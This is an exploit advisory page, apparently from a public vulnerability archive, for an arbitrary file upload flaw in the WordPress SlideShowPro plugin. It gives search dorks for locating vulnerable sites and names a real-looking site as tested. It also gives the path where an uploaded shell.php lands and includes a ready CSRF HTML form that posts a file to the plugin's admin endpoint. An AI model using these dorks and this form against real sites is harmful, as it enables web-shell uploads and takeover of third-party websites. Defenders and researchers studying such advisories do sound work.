Wordpress Plugin slideshowpro Arbitrary File Upload

2017.01.07
id K33P-S1L3NT (ID) id
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/wp-content/plugin/slide-show-pro/ or inurl:plugin/slide-show-pro/ or inurl:/wp-content/uploads/slideshowpro/

// Author : i.am_geek // Team : K33P-S1L3NT // Email : k33ps1l3nt@outlook.com // Notif : Ternate Lab Pentesting // page : https://www.facebook.com/loading.gov // Plugin : https://wordpress.org/plugins/slide-show-pro/ // Category : Webapps // demo : https://www.youtube.com/watch?v=cVAX1To8cag // Tested : http://www.gotdirtywindows.com.au/ // Dork : inurl:/wp-content/plugin/slide-show-pro/ or inurl:plugin/slide-show-pro/ or inurl:/wp-content/uploads/slideshowpro/ // shell : /wp-content/uploads/slideshowpro/1_uploadfolder/big/shell.php // Grets : s1puT | geek_Defcon | kazutto_kun | Zbyte | Badaki | 1!0N7!N | QueenAisyha // Special : Iran-Hack | Turkish-Hack | Overload Team | Ellite Pirates | Tunisia Black Security | Algarian Sec | Indonesia Noobs // Proof of Concept // Make sure to replace “[path to WordPress]” with the location of WordPress. // CSRF CODE : <html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=slideshowpro_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="pro_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html>

References:

https://www.facebook.com/loading.gov/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top